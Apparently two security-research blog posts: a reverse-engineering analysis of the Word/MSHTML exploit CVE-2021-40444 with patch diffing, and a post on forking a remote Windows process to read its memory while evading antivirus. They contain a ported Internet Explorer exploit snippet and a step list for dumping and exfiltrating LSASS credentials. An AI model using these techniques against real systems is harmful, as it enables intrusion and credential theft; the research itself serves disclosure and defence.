After I opened the malicious Word document, Fiddler immediately captured strange HTTP requests to the domain, "hidusi[.]com". For some reason, the Word document was making a request to "http://hidusi[.]com/e8c76295a5f9acb7/side.html".

At this point, the "hidusi[.]com" domain was already taken down. Fortunately, the "side.html" file being requested was included with the sample that was shared with me.

Unfortunately, the HTML file was largely filled with obfuscated JavaScript. Although I could immediately decrypt this JavaScript and go from there, this is generally a bad idea to do at an early stage because we have no understanding of the exploit.

Reproduction

Whenever I encounter a new vulnerability that I want to reverse engineer, my first goal is always to produce a minimal reproduction example of the exploit to ensure I have a working test environment and a basic understanding of how the exploit works. Having a reproduction case is critical to reverse engineering how the bug works, because it allows for dynamic analysis.

Since the original "hidusi[.]com" domain was down, we needed to host our version of side.html. Hosting a file is easy, but how do we make the Word document use our domain instead? It was time to find where the URL to side.html was hidden inside the Word document.

Raw Bytes of "A Letter before court 4.docx"

Extracted Contents of "A Letter before court 4.docx"

Did you know that Office documents are just ZIP files? As we can see from the bytes of the malicious document, the first few bytes are simply the magic value in the ZIP header.

Once I extracted the document as a ZIP, finding the URL was relatively easy. I performed a string search across every file the document contained for the domain "hidusi[.]com".

Hidusi[.]com found under word/_rels/document.xml.rels

Sure enough, I found one match inside the file "word/_rels/document.xml.rels". This file is responsible for defining relationships associated with embedded objects in the document.

OLE objects are part of Microsoft's proprietary Object Linking and Embedding technology, which allows external documents, such as an Excel spreadsheet, to be embedded within a Word document.

Strange Target for OLE Object

The relationship that contained the malicious URL was an external OLE object with a strange "Target" attribute containing the "mhtml" protocol. Let's unpack what's going on in this value.

In red, we see the URL Protocol "mhtml".
In green, we see the malicious URL our proxy caught.
In blue, we see an interesting "!x-usc" suffix appended to the malicious URL.
In purple, we see the same malicious URL repeated.

Let's investigate each piece one-by-one.

Reproduction: What's "MHTML"?

A useful tool I've discovered in past research is URLProtocolView from Nirsoft. At a high level, URLProtocolView allows you to list and enumerate the URL protocols installed on your machine.

The MHTML Protocol in URLProtocolView

The MHTML protocol used in the Target attribute was a Pluggable Protocol Handler, similar to HTTP. The inetcomm.dll module was responsible for handling requests to this protocol.

The HTTP* Protocols in URLProtocolView

Unlike MHTML however, the HTTP protocol is handled by the urlmon.dll module.

When I was researching past exploits involving the MHTML protocol, I came across an interesting article all the way back from 2011 about CVE-2011-0096. In this case, a Google engineer publicly disclosed an exploit that they suspected malicious actors attributed to China had already discovered. Similar to this vulnerability, CVE-2021-0096 was only found to be used in "very targeted" attacks.

When I was researching implementations of exploits for CVE-2011-0096, I came across an exploit-db release that included an approach for abusing the vulnerability through a Word document. Specifically, in part #5 and #6 of the exploit, this author discovered that CVE-2011-0096 could be abused to launch executables on the local machine and read the contents of the local filesystem. The interesting part here is that this 2011 vulnerability involved abusing the MHTML URL protocol and that it allowed for remote code execution via a Word document, similar to the case with CVE-2021-4044.

Reproduction: What about the "X-USC" in the Target?

Going back to our strange Target attribute, what is the "!x-usc:" portion for?

I found a blog post from 2018 by @insertScript which discovered that the x-usc directive was used to reference an external link. In fact, the example URL given by the author still works on the latest version of Internet Explorer (IE). If you enter "mhtml:http://google.com/whatever!x-usc:http://bing.com" into your IE URL bar while monitoring network requests, there will be both a request to Google and Bing, due to the "x-usc" directive.

In the context of CVE-2021-40444, I was unable to discover a definitive answer for why the same URL was repeated after an "x-usc" directive. As we'll see in upcoming sections, the JavaScript in side.html is executed regardless of whether or not the attribute contains the "x-usc" suffix. It is possible that due to some potential race conditions, this suffix was added to execute the exploit twice to ensure successful payload delivery.

Reproduction: Attempting to Create my Own Payload

Now that we know how the remote side.html page is triggered by the Word document, it was time to try and create our own. Although we could proceed by hosting the same side.html payload the attackers used in their exploit, it is important to produce a minimal reproduction example first.

Instead of hosting the second-stage side.html payload, I opted to write a barebone HTML page that would indicate JavaScript execution was successful. This way, we can understand how JavaScript is executed by the Word document before reverse engineering what the attacker's JavaScript does.

Test Payload to Prove JS Execution

In the example above, I created an HTML page that simply made an XMLHttpRequest to a non-existent domain. If the JavaScript is executed, we should be able to see a request to "icanseethisrequestonthenetwork.com" inside of Fiddler.

Before testing in the actual Word document, I verified as a sanity check that this page does make the web request inside of Internet Explorer. Although the code may seem simple enough to where it would "obviously work", performing simple sanity checks like these on fundamental assumptions you make can greatly save you time debugging future issues. For example, if you don't verify a fundamental assumption and continue with reverse engineering, you could spend hours debugging the wrong issue when in fact you were missing a basic mistake.

Modified Relationship with Barebone Payload

Network Requests After Executing Modified Document

Once I patched the original Word document with my modified relationship XML, I launched it inside my VM with the Fiddler proxy running. I was seeing requests to the send_request.html payload! But... there were no requests to "icanseethisonthenetwork.com". We have demonstrated a flaw in our fundamental assumption that whatever HTML page we point the MHTML protocol towards will be executed.

How do you debug an issue like this? One approach would be to go in blind and try to reverse engineer the internals of the HTML engine to see why JavaScript wasn't being executed. The reason this is not a great idea is because often these codebases can be massive, and it would be like finding a needle in a haystack.

What can we do instead? Create a minimally viable reproduction case where the JavaScript of the HTML is executed. We know that the attacker's payload must have worked in their attack. What if instead of writing our own payload first, we tried to host their payload instead?

Network Requests After Executing with Side.html Payload

I uploaded the attacker’s original "side.html" payload to my server and replaced the relationship in the Word document with that URL. When I executed this modified document in my VM, I saw something extremely promising- requests for "ministry.cab". This means that the attacker's JavaScript inside side.html was executed!

We have an MVP payload that gets executed by the Word document, now what? Although we could ignore our earlier problem with our own payload and try to figure out what the CAB file is used for directly, we'd be skipping a crucial step of the exploit. We want to understand CVE-2021-40444, not just reproduce it.

With this MVP, we can now try to debug and reverse engineer the question, "Why does the working payload result in JavaScript execution, but not our own sample?".

Reproduction: Reverse Engineering Microsoft’s HTML Engine

The primary module responsible for processing HTML in Windows is MSHTML.DLL, the "Microsoft HTML Viewer". This binary alone is 22 MB, because it contains almost everything from rendering HTML to executing JavaScript. For example, Microsoft has their own JavaScript engine in this binary used in Internet Explorer (and Word).

Given this massive size, blindly reversing is a terrible approach. What I like to do instead is use ProcMon to trace the execution of the successful (document with side.html) and failing payload (document with barebone HTML), then compare their results. I executed the attacker payload document and my own sample document while monitoring Microsoft Word with ProcMon.

Microsoft Word Loading JScript9.dll in Success Case

With the number of operations an application like Microsoft Office makes, it can be difficult to sift through the noise. The best approach I have for this problem is to use my context to find relevant operations. In this case, since we were looking into the execution of JavaScript, I looked for operations involving the word “script”.

You might think, what can we do with relevant operations? An insanely useful feature of ProcMon is the ability to see the caller stack for a given operation. This lets you see what executed the operation.

Stack Trace of JScript9.dll Module Load

IDA Pro Breakpoint on PostManExecute

It looked like the PostManExecute function was primary responsible for triggering the complete execution of our payload. Using IDA Pro, I set a breakpoint on this function and opened both the successful/failing payloads.

I found that when the success payload was launched, PostManExecute would be called, and the page would be loaded. On the failure case however, PostManExecute was not called and thus the page was never executed. Now we needed to figure out why is PostManExecute being invoked for the attacker’s payload but not ours?

Partial Stack Trace of JScript9.dll Module Load

Going back to the call stack, what’s interesting is that PostManExecute seems to be the result of a callback that is being invoked in an asynchronous thread.

X-Refs to CDwnChan::OnMethodCall from Call Stack

Looking at the cross references for the function called right after the asynchronous dispatcher, CDwnChan::OnMethodCall, I found that it seemed to be queued in another function called CDwnChan::Signal.

Asynchronous Execution of CDwnChan::OnMethodCall inside CDwnChan::Signal

X-Refs to CDwnChan::Signal

CDwnChan::Signal seemed to be using the function "_GWPostMethodCallEx" to queue the CDwnChan::OnMethodCall to be executed in the asynchronous thread we saw. Unfortunately, this Signal function is called from many places, and it would be a waste of time to try to statically reverse engineer every reference.

X-Refs to Asynchronous Queue'ing Function __GWPostMethodCallEx

What can we do instead? Looking at the X-Refs for _GWPostMethodCallEx, it seemed like it was used to queue almost everything related to HTML processing. What if we hooked this function and compared the different methods that were queued between the success and failure path?

Whenever __GWPostMethodCallEx was called, I recorded the method being queued for asynchronous execution and the call stack. The diagram above demonstrates the methods that were queued during the execution of the successful payload and the failing payload. Strangely in the failure path, the processing of the HTML page was terminated (CDwnBindData::TerminateOnApt) before the page was ever executed.

Callstack for CDwnBindData::TerminateOnApt

Why was the Terminate function being queued before the OnMethodCall function in the failure path? The call stacks for the Terminate function matched between the success and failure paths. Let’s reverse engineer those functions.

Partial Pseudocode of CDwnBindData::Read

When I debugged the CDwnBindData::Read function, which called the Terminate function, I found that a call to CDwnStm::Read was working in the success path but returning an error in the failure path. This is what terminated the page execution for our sample payload!

The third argument to CDwnStm::Read was supposed to be the number of bytes the client should try to read from the server. For some reason, the client was expecting 4096 bytes and my barebone HTML file was not that big.

As a sanity check, I added a bunch of useless padding to the end of my HTML file to make its size 4096+ bytes. Let’s see our network requests with this modified payload.

Modified Barebone HTML with Padding to 4096 bytes

Network Requests of Barebone Word Document

We had now found and fixed the issue with our barebone HTML page! But our work isn't over yet. We wouldn’t be great reverse engineers if we didn’t investigate why the client was expecting 4096 bytes in the first place.

Partial Pseudocode of CHtmPre::GetReadRequestSize

I traced back the origin of the expected size to a call in CHtmPre::Read to CHtmPre::GetReadRequestSize. Stepping through this function in a debugger, I found that a field at offset 136 of the CHtmPre class represented the request size the client should expect. How can we find out why this value is 4096? Something had to write to it at some point.

Partial Pseudocode of CHtmPre Constructor

Since we were looking at a class function of the CHtmPre class, I set a breakpoint on the constructor for this class. When the debugger reached the constructor, I placed a write memory breakpoint for the field offset we saw (+ 136).

Partial Pseudocode of CEncodeReader Constructor when the Write Breakpoint Hit

The breakpoint hit! And not so far away either. The 4096 value was being set inside of another object constructor, CEncodeReader::CEncodeReader. This constructor was instantiated by the CHtmPre constructor we just hooked. Where did the 4096 come from then? It was hardcoded into the CHtmPre constructor!

Partial Pseudocode of CHtmPre Constructor, Highlighting Hardcoded 4096 Value

What was happening was that when the CHtmPre instance was constructed, it had a default read size of 4096 bytes. The client was reading the bytes from the HTTP response before this field was updated with the real response size. Since our barebone payload was just a small HTML page under 4096 bytes, the client thought that the server hadn’t sent the required response and thus terminated the execution.

The reason the attacker's payload worked is because it was above 4096 bytes in size. We just found a bug still present in Microsoft’s HTML processor!

Reproduction: Fixing the Attacker's Payload

Network Requests After Executing with Side.html Payload

We figured out how to make sure our payload executes. If you recall to an earlier section of this blog post, we saw that a request to a "ministry.cab" file was being made by the attacker's side.html payload. Fortunately for us, the attacker’s sample came with the CAB file the server was originally serving.

This CAB file was interesting. It had a single file named "../msword.inf", suggesting a relative path escape attack. This INF file was a PE binary for the attacker’s Cobalt Strike beacon. I replaced this file with a simple DLL that opened Calculator for testing. Unfortunately, when I uploaded this CAB file to my server, I saw a successful request to it but no Calculator.

Operations involving msword.inf from CAB file

Call stack of msword.inf Operation

I monitored Word with ProcMon once again to try and see what was happening with the CAB file. I filtered for "msword.inf" and found interesting operations where Word was writing it to the VM user's %TEMP% directory. The "VerifyTrust" function name in the call stack suggested that the INF file was written to the TEMP directory while it was trying to verify its signature.

Let's step through these functions to figure out what's going on.

Partial Pseudocode of Cwvt::VerifyTrust

After stepping through Cwvt::VerifyTrust with a debugger, I found that the function attempted to verify the signature of files contained within the CAB file. Specifically, if the CAB file included an INF file, it would extract it to disk and try to verify its digital signature.

What was happening was that the extraction process didn't have any security measures, allowing for an attacker to use relative path escapes to get out of the temporary directory that was generated for the CAB file.

The attackers were using a zero-day with ActiveX controls:

The attacker’s JavaScript (side.html) would attempt to execute the CAB file as an ActiveX control.
This triggered Microsoft’s security controls to verify that the CAB file was signed and safe to execute.
Unfortunately, Microsoft handled this CAB file without care and although the signature verification fails, it allowed an attacker to extract the INF file to another location with relative path escapes.

If there was a user-writable directory where if you could put a malicious INF file, it would execute your malware, then they could have stopped here with their exploit. This isn’t a possibility though, so they needed some way to execute the INF file as a PE binary.

Strange control.exe Execution with INF File in Command Line

Strange rundll32.exe Execution with INF File in Command Line

Going back to ProcMon, I tried to see why the INF file wasn’t being executed. It looks like they were using another exploit to trigger execution of "control.exe".

".cpl" Used as a URL Protocol

The attackers were triggering the execution of a Control Panel Item. The command line for control.exe suggested they were using the ".cpl" file extension as a URL protocol and then used relative path escapes to trigger the INF file.

Why wasn’t my Calculator DLL being executed then? Entirely my mistake! I was executing the Word document from a nested directory, but the attackers were only spraying a few relative path escapes that never reached my user directory. This makes sense because this document is intended to be executed from a victim's Downloads folder, whereas I was hosting the file inside of a nested Documents directory.

I placed the Word document in my Downloads folder and… voila:

Calculator being Executed by Word Document

Reversing the Attacker's Payload

We have a working exploit! Now the next step to understanding the attack is to reverse engineer the attacker’s malicious JavaScript. If you recall, it was somewhat obfuscated. As someone with experience with JavaScript obfuscators, it didn’t seem like the attacker’s did too much, however.

Common JavaScript String Obfuscation Technique seen in Attacker's Code

A common pattern I see with attempts at string obfuscation in JavaScript is an array containing a bunch of strings and the rest of the code referencing strings through an unknown function which referenced that array.

In this case, we can see a string array named "a0_0x127f" which is referenced inside of the global function "a0_0x15ec". Looking at the rest of the JavaScript, we can see that several parts of it call this unknown function with an numerical index, suggesting that this function is used to retrieve a deobfuscated version of the string.

String Deobfuscation Script

This approach to string obfuscation is relatively easy to get past. I wrote a small script to find all calls to the encryption function, resolve what the string was, and replace the entire call with the real string. Instead of worrying about the mechanics of the deobfuscation function, we can just call into it like the real code does to retrieve the deobfuscated string.

Before String Deobfuscation

After String Deobfuscation

This worked extremely well and we now have a relatively deobfuscated version of their script. The rest of the deobfuscation was just combining strings, getting rid of "indirect" calls to objects, and naming variables given their context. I can’t cover each step in detail because there were a lot of minor steps for this last part, but there was nothing especially notable. I tried naming the variables the best I could given the context around them and commented out what I thought was happening.

Let’s review what the script does.

Part #1 of Deobfuscated JavaScript: Create and Destroy an IFrame

In this first part, the attacker's created an iframe element, retrieved the ActiveX scripting interface for that iframe, and destroyed the iframe. Although the iframe has been destroyed, the ActiveX interface is still live and can be used to execute arbitrary HTML/JavaScript.

Part #2 of Deobfuscated JavaScript: Create Nested ActiveX HTML Documents

In this next part, the attackers used the destroyed iframe's ActiveX interface to create three nested HTML documents. I am not entirely sure what the purpose of these nested documents serves, because if the attackers only used the original ActiveX interface without any nesting, the exploit works fine.

Part #3 of Deobfuscated JavaScript: Create ActiveX Control and Trigger INF File

This final section is what performs the primary exploits.

The attackers make a request to the exploit CAB file ("ministry.cab") with an XMLHttpRequest. Next, the attackers create a new ActiveX Control object inside of the third nested HTML document created in the last step. The class ID and version of this ActiveX control are arbitrary and can be changed, but the important piece is that the ActiveX Control points at the previously requested CAB file. URLMON will automatically verify the signature of the ActiveX Control CAB file, which is when the malicious INF file is extracted into the user's temporary directory.

To trigger their malicious INF payload, the attackers use the ".cpl" file extension as a URL Protocol with a relative path escape in a new HTML document. This causes control.exe to start rundll32.exe, passing the INF file as the Control Panel Item to execute.

The fully deobfuscated and commented HTML/JS payload can be found here.

Overview of the Attack

We covered a significant amount in the previous sections, let's summarize the attack from start to finish:

A victim opens the malicious Word document.
Word loads the attacker's HTML page as an OLE object and executes the contained JavaScript.
An IFrame is created and destroyed, but a reference to its ActiveX scripting surface remains.
The CAB file is invoked by creating an ActiveX control for it.
While the CAB file's signature is verified, the contained INF file is written to the user's Temp directory.
Finally, the INF is invoked by using the ".cpl" extension as a URL protocol, using relative path escapes to reach the temporary directory.

Reversing Microsoft's Patch

When Microsoft released its advisory for this bug on September 7th, they had no patch! To save face, they claimed Windows Defender was a mitigation, but that was just a detection for the attacker's exploit. The underlying vulnerability was untouched.

It took them nearly a month from when the first known sample was uploaded to VirusTotal (August 19th) to finally fix the issue on September 14th with a Patch Tuesday update. Let’s take a look at the major changes in this patch.

A popular practice by security researchers is to find the differences in binaries that used to contain vulnerabilities with the patched binary equivalent. I updated my system but saved several DLL files from my unpatched machine. There are a couple of tools that are great for finding assembly-level differences between two similar binaries.

BinDiff by Zynamics
Diaphora by Joxean Koret

I went with Diaphora because it is more advanced than BinDiff and allows for easy pseudo-code level comparisons. The primary binaries I diff'd were:

IEFRAME.dll - This is what executed the URL protocol for ".cpl".
URLMON.dll - This is what had the CAB file extraction exploit.

Reversing Microsoft's Patch: IEFRAME

Once I diff’d the updated and unpatched binary, I found ~1000 total differences, but only ~30 major changes. One function that had heavy changes and was associated with the CPL exploit was _AttemptShellExecuteForHlinkNavigate.

Pseudocode Diff of _AttemptShellExecuteForHlinkNavigate

In the old version of IEFRAME, this function simply used ShellExecuteW to open the URL protocol with no verification. This is why the CPL file extension was processed as a URL protocol.

In the new version, they added a significant number of checks for the URL protocol. Let’s compare the differences.

Patched _AttemptShellExecuteForHlinkNavigate Pseudocode

New IsValidSchemeName Function

In the patched version of _AttemptShellExecuteForHlinkNavigate, the primary addition that prevents the use of file extensions as URL Protocols is the call to IsValidSchemeName.

This function takes the URL Protocol that is being used (i.e ".cpl") and verifies that all characters in it are alphanumerical. For example, this exploit used the CPL file extension to trigger the INF file. With this patch, ".cpl" would fail the IsValidSchemeName function because it contains a period which is non-alphanumerical.

An important factor to note is that this patch for using file extensions as URL Protocols only applies to MSHTML. File extensions are still exposed for use in other attacks against ShellExecute, which is why I wouldn't be surprised if we saw similar techniques in future vulnerabilities.

Reversing Microsoft's Patch: URLMON

I performed the same patch diffing on URLMON and found a major change in catDirAndFile. This function was used during extraction to generate the output path for the INF file.

Patched catDirAndFile Pseudocode

The patch for the CAB extraction exploit was extremely simple. All Microsoft did was replace any instance of a forward slash with a backslash. This prevents the INF extraction exploit of the CAB file because backslashes are ignored for relative path escapes.

Abusing CVE-2021-40444 in Internet Explorer

Although Microsoft's advisory covers an attack scenario where this vulnerability is abused in Microsoft Office, could we exploit this bug in another context?

Since Microsoft Office uses the same engine Internet Explorer uses to display web pages, could CVE-2021-40444 be abused to gain remote code execution from a malicious page opened in IE? When I tried to visit the same payload used in the Word document, the exploit did not work "out of the box", specifically due to an error with the pop up blocker.

IE blocks .cpl popup

Although the CAB extraction exploit was successfully triggered, the attempt to launch the payload failed because Internet Explorer considered the ".cpl" exploit to be creating a pop up.

Fortunately, we can port the .cpl exploit to get around this pop up blocker relatively easily. Instead of creating a new page, we can simply redirect the current page to the ".cpl" URL.

function redirect() {
    //
    // Redirect current window without creating new one,
    // evading the IE pop up blocker.
    //
    window.location = ".cpl:../../../AppData/Local/Temp/Low/msword.inf";
    document.getElementById("status").innerHTML = "Done";
}

//
// Trigger in 500ms to give time for the .cab file to extract.
//
setTimeout(function() {
    redirect()
}, 500);

With the small addition of the redirect, CVE-2021-40444 works without issue in Internet Explorer. The complete code for this ported HTML/JS payload can be found here.

Conclusion

CVE-2021-40444 is in fact compromised of several vulnerabilities as we investigated in this blog post. Not only was there the initial step of extracting a malicious file to a predictable location through the CAB file exploit, but there was also the fact that URL Protocols could be file extensions.

In the latest patch, Word still executes pages with JavaScript if you use the MHTML protocol. What’s frightening to me is that the entire attack surface of Internet Explorer is exposed to attackers through Microsoft Word. That is a lot of legacy code. Time will tell what other vulnerabilities attacker's will abuse in Internet Explorer through Microsoft Office.

Abusing Windows’ Implementation of Fork() for Stealthy Memory Operations

Bill Demirkapi — Fri, 26 Nov 2021 04:32:04 GMT

Note: Another researcher recently tweeted about the technique discussed in this blog post, this is addressed in the last section of the blog (warning, spoilers!).

To access information about a running process, developers generally have to open a handle to the process through the OpenProcess API specifying a combination of 13 different process access rights:

PROCESS_ALL_ACCESS - All possible access rights for a process.
PROCESS_CREATE_PROCESS - Required to create a process.
PROCESS_CREATE_THREAD - Required to create a thread.
PROCESS_DUP_HANDLE - Required to duplicate a handle using DuplicateHandle.
PROCESS_QUERY_INFORMATION - Required to retrieve general information about a process such as its token, exit code, and priority class.
PROCESS_QUERY_LIMITED_INFORMATION - Required to retrieve certain limited information about a process.
PROCESS_SET_INFORMATION - Required to set certain information about a process such as its priority.
PROCESS_SET_QUOTA - Required to set memory limits using SetProcessWorkingSetSize.
PROCESS_SUSPEND_RESUME - Required to suspend or resume a process.
PROCESS_TERMINATE - Required to terminate a process using TerminateProcess.
PROCESS_VM_OPERATION - Required to perform an operation on the address space of a process (VirtualProtectEx, WriteProcessMemory).
PROCESS_VM_READ - Required to read memory in a process using ReadProcessMemory.
PROCESS_VM_WRITE - Required to write memory in a process using WriteProcessMemory.

The access rights requested will impact whether or not a handle to the process is returned. For example, a normal process running under a standard user can open a SYSTEM process for querying basic information, but it cannot open that process with a privileged access right such as PROCESS_VM_READ.

In the real world, the importance of process access rights can be seen in the restrictions anti-virus and anti-cheat products place on certain processes. An anti-virus might register a process handle create callback to prevent processes from opening the Local Security Authority Subsystem Service (LSASS) which could contain sensitive credentials in its memory. An anti-cheat might prevent processes from opening the game they are protecting, because cheaters can access key regions of the game memory to gain an unfair advantage.

When you look at the thirteen process access rights, do any of them strike out as potentially malicious? I investigated that question by taking a look at the drivers for several anti-virus products. Specifically, what access rights did they filter for in their process handle create callbacks? I came up with this subset of access rights that were often directly associated with potentially malicious operations: PROCESS_ALL_ACCESS, PROCESS_CREATE_THREAD, PROCESS_DUP_HANDLE, PROCESS_SET_INFORMATION, PROCESS_SUSPEND_RESUME, PROCESS_TERMINATE, PROCESS_VM_OPERATION, PROCESS_VM_READ, and PROCESS_VM_WRITE.

This leaves four other access rights that were discovered to be largely ignored:

PROCESS_QUERY_INFORMATION - Required to retrieve general information about a process such as its token, exit code, and priority class.
PROCESS_QUERY_LIMITED_INFORMATION - Required to retrieve certain limited information about a process.
PROCESS_SET_QUOTA - Required to set memory limits using SetProcessWorkingSetSize.
PROCESS_CREATE_PROCESS - Required to create a process.

These access rights were particularly interesting because if we could find a way to abuse any of them, we could potentially evade the detection of a majority of anti-virus products.

Most of these remaining rights cannot modify important aspects of a process. PROCESS_QUERY_INFORMATION and PROCESS_QUERY_LIMITED_INFORMATION are purely for reading informational details about a process. PROCESS_SET_QUOTA does impact the process, but does not provide much surface to abuse. For example, being able to set a processes' performance limits provides limited usefulness in an attack.

What about PROCESS_CREATE_PROCESS? This access right allows a caller to "create a process" using the process handle, but what does that mean?

In practice, someone with a process handle containing this access right can create processes on behalf of that process. In the following sections, we will explore existing techniques that abuse this access right and its undiscovered potential.

Parent Process Spoofing

An existing evasion technique called "parent process ID spoofing" is used when a malicious application would like to create a child process under a different process. This allows an attacker to create a process while having it appear as if it was launched by another legitimate application.

At a high-level, common implementations of parent process ID spoofing will:

Call InitializeProcThreadAttributeList to initialize an attribute list for the child process.
Use OpenProcess to obtain a PROCESS_CREATE_PROCESS handle to the fake parent process.
Update the previously initialized attribute list with the parent process handle using UpdateProcThreadAttribute.
Create the child process with CreateProcess, passing extended startup information containing the process attributes.

This technique provides more usefulness than just being able to spoof the parent process of a child. It can be used to attack the parent process itself as well.

When creating a process, if the attacker specifies TRUE for the InheritHandles argument, all inheritable handles present in the parent process will be given to the child. For example, if a process has an inheritable thread handle and an attacker would like to obtain this handle indirectly, the attacker can abuse parent process spoofing to create their own malicious child process which inherits these handles.

The malicious child process would then be able to abuse these inherited handles in an attack against the parent process, such as a child using asynchronous procedure calls (APCs) on the parent's thread handle. Although this variation of the technique does require that the parent have critical handles set to be inheritable; several common applications, such as Firefox and Chrome, have inheritable thread handles.

Ways to Create Processes

The previous section explored one existing attack that used the high-level kernel32.dll function CreateProcess, but this is not the only way to create a process. Kernel32 provides abstractions such as CreateProcess which allow developers to avoid having to use ntdll functions directly.

When taking a look under the hood, kernel32 uses ntdll functions and does much of the heavy lifting required to perform NtXx calls. CreateProcess uses NtCreateUserProcess, which has the following function prototype:

NTSTATUS NTAPI
NtCreateUserProcess (
    PHANDLE ProcessHandle,
    PHANDLE ThreadHandle,
    ACCESS_MASK ProcessDesiredAccess,
    ACCESS_MASK ThreadDesiredAccess,
    POBJECT_ATTRIBUTES ProcessObjectAttributes,
    POBJECT_ATTRIBUTES ThreadObjectAttributes,
    ULONG ProcessFlags,
    ULONG ThreadFlags,
    PRTL_USER_PROCESS_PARAMETERS ProcessParameters,
    PPROCESS_CREATE_INFO CreateInfo,
    PPROCESS_ATTRIBUTE_LIST AttributeList
    );

NtCreateUserProcess is not the only low-level function exposed to create processes. There are two legacy alternatives: NtCreateProcess and NtCreateProcessEx. Their function prototypes are:

NTSTATUS NTAPI
NtCreateProcess (
    PHANDLE ProcessHandle,
    ACCESS_MASK DesiredAccess,
    POBJECT_ATTRIBUTES ObjectAttributes,
    HANDLE ParentProcess,
    BOOLEAN InheritObjectTable,
    HANDLE SectionHandle,
    HANDLE DebugPort,
    HANDLE ExceptionPort
    );

NTSTATUS NTAPI
NtCreateProcessEx (
    PHANDLE ProcessHandle,
    ACCESS_MASK DesiredAccess,
    POBJECT_ATTRIBUTES ObjectAttributes,
    HANDLE ParentProcess,
    ULONG Flags,
    HANDLE SectionHandle,
    HANDLE DebugPort,
    HANDLE ExceptionPort,
    BOOLEAN InJob
    );

NtCreateProcess and NtCreateProcessEx are quite similar but offer a different route of process creation when compared to NtCreateUserProcess.

Forking Your Own Process

A lesser documented limited technique available to developers is the ability to fork processes on Windows. The undocumented function developers can use to fork their own process is RtlCloneUserProcess. This function does not directly call the kernel and instead is a wrapper around NtCreateUserProcess.

A minimal implementation of forking through NtCreateUserProcess can be achieved trivially. By calling NtCreateUserProcess with NULL for both object attribute arguments, NULL for the process parameters, an empty (but not NULL) create info argument, and a NULL attribute list; a fork of the current process will be created.

One question that arose when performing this research was: What is the difference between forking a process and creating a new process with handles inherited? Interestingly, the minimal forking mechanism present in Windows does not only include inheritable handles, but private memory regions too. Any dynamically allocated pages as part of the parent will be accessible at the same location in the child as well.

Both RtlCloneUserProcess and the minimal implementation described are publicly known techniques for simulating fork on Windows, but is there any use forking provides to an attacker?

In 2019, Microsoft Research Labs published a paper named "A fork() in the road", which discussed how what used to be a "clever hack" has "long outlived its usefulness and is now a liability". The paper discusses several areas, such as how fork is a "terrible abstraction" and how it compromises OS implementations. The section titled "FORK IN THE MODERN ERA" is particularly relevant:

Fork is insecure. By default, a forked child inherits everything from its parent, and the programmer is responsible for explicitly removing state that the child does not need by: closing file descriptors (or marking them as close-on-exec), scrubbing secrets from memory, isolating namespaces using unshare() [52], etc. From a security perspective, the inherit by-default behaviour of fork violates the principle of least privilege.

This section covers the security risk that is posed by the ability to fork processes. Microsoft provides the example that a forked process "inherits everything from its parent" and that "the programmer is responsible for explicitly removing state that the child does not need". What happens when the programmer is a malicious attacker?

Forking a Remote Process

I propose a new method of abusing the limited fork functionality present in Windows. Instead of forking your own process, what if you forked a remote process? If an attacker could fork a remote process, they would be able to gain insight into the target process without needing a sensitive process access right such as PROCESS_VM_READ, which could be monitored by anti-virus.

With only a PROCESS_CREATE_PROCESS handle, an attacker can fork or "duplicate" a process and access any secrets that are present in it. When using the legacy NtCreateProcess(Ex) variant, forking a remote process is relatively simple.

By passing NULL for the SectionHandle and a PROCESS_CREATE_PROCESS handle of the target for the ParentProcess arguments, a fork of the remote process will be created and an attacker will receive a handle to the forked process. Additionally, as long as the attacker does not create any threads, no process creation callbacks will fire. This means that an attacker could read the sensitive memory of the target and anti-virus wouldn't even know that the child process had been created.

When using the modern NtCreateUserProcess variant, all an attacker needs to do is use the previous minimal implementation of forking your own process but pass the target process handle as a PsAttributeParentProcess in the attribute list.

With the child handle, an attacker could read sensitive memory from the target application for a variety of purposes. In the following sections, we'll cover approaches to detection and an example of how an attacker could abuse this in a real attack.

Example: Anti-Virus Tampering

Some commercial anti-virus solutions may include self-integrity features designed to combat tampering and information disclosure. If an attacker could access the memory of the anti-virus process, it is possible that sensitive information about the system or the anti-virus itself could be abused.

With Process Forking, an attacker can gain access to both private memory and inheritable handles with only a PROCESS_CREATE_PROCESS handle to the victim process. A few examples of attacks include:

An attacker could read the encryption keys that are used to communicate with a trusted anti-virus server to decrypt or potentially tamper with this line of communication. For example, an attacker could pose as a man-in-the-middle (MiTM) with these encryption keys to prevent the anti-virus client from communicating alerts or spoof server responses to further tamper with the client.
An attacker could gain access to sensitive information about the system that was provided by the kernel. This information could include data from kernel callbacks that an attacker otherwise would not have access to from usermode.
An attacker could gain access to any handle the anti-virus process holds that is marked as inheritable. For example, if the anti-virus protects certain files from being accessed, such as sensitive configuration files, an attacker may be able to inherit a handle opened by the anti-virus process itself to access that protected file.

Example: Credential Dumping

One obvious target for a stealthy memory reading technique such as this is the Local Security Authority Subsystem Service (LSASS). LSASS is often the target of attackers that wish to capture the credentials for the current machine.

In a typical attack, a malicious program such as Mimikatz directly interfaces with LSASS on the victim machine, however, a stealthier alternative has been to dump the memory of LSASS for processing on an attacker machine. This is to avoid putting a well-known malicious program such as Mimikatz on the victim environment which is much more likely to be detected.

With Process Forking, an attacker can evade defensive solutions that monitor or prevent access to the LSASS process by dumping the memory of an LSASS fork instead:

Set debug privileges for your current process if you are not already running as SYSTEM.
Open a file to write the memory dump to.
Create a fork child of LSASS.
Use the common MiniDumpWriteDump API on the forked child.
Exfiltrate the dump file to an attacker machine for further processing.

Proof of Concept

A simple proof-of-concept utility and library have been published on GitHub.

Conclusion

Process Forking still requires that an attacker would have access to the victim process in the default Windows security model. Process Forking does not break integrity boundaries and attackers are restricted to processes running at the same privilege level they are. What Process Forking does offer is a largely ignored alternative to handle rights that are known to be potentially malicious.

Remediation may be difficult depending on the context of the solution relying on handle callbacks. An anti-cheat defending a single process may be able to get away with stripping PROCESS_CREATE_PROCESS handles entirely, but anti-virus solutions protecting multiple processes attempting a similar fix could face compatibility issues. It is recommended that vendors who opt to strip this access right initially audit its usage within customer environments and limit the processes they protect as much as possible.

Didn't I see this on Twitter yesterday?

Did you know that it is possible to read memory using a PROCESS_CREATE_PROCESS handle? Just call NtCreateProcessEx to clone the target process (and its entire address space), and then read anything you want from there.😎
— diversenok (@diversenok_zero) November 25, 2021

Yesterday morning, I saw this interesting tweet from @diversenok_zero explaining the same method discussed in this blog post.

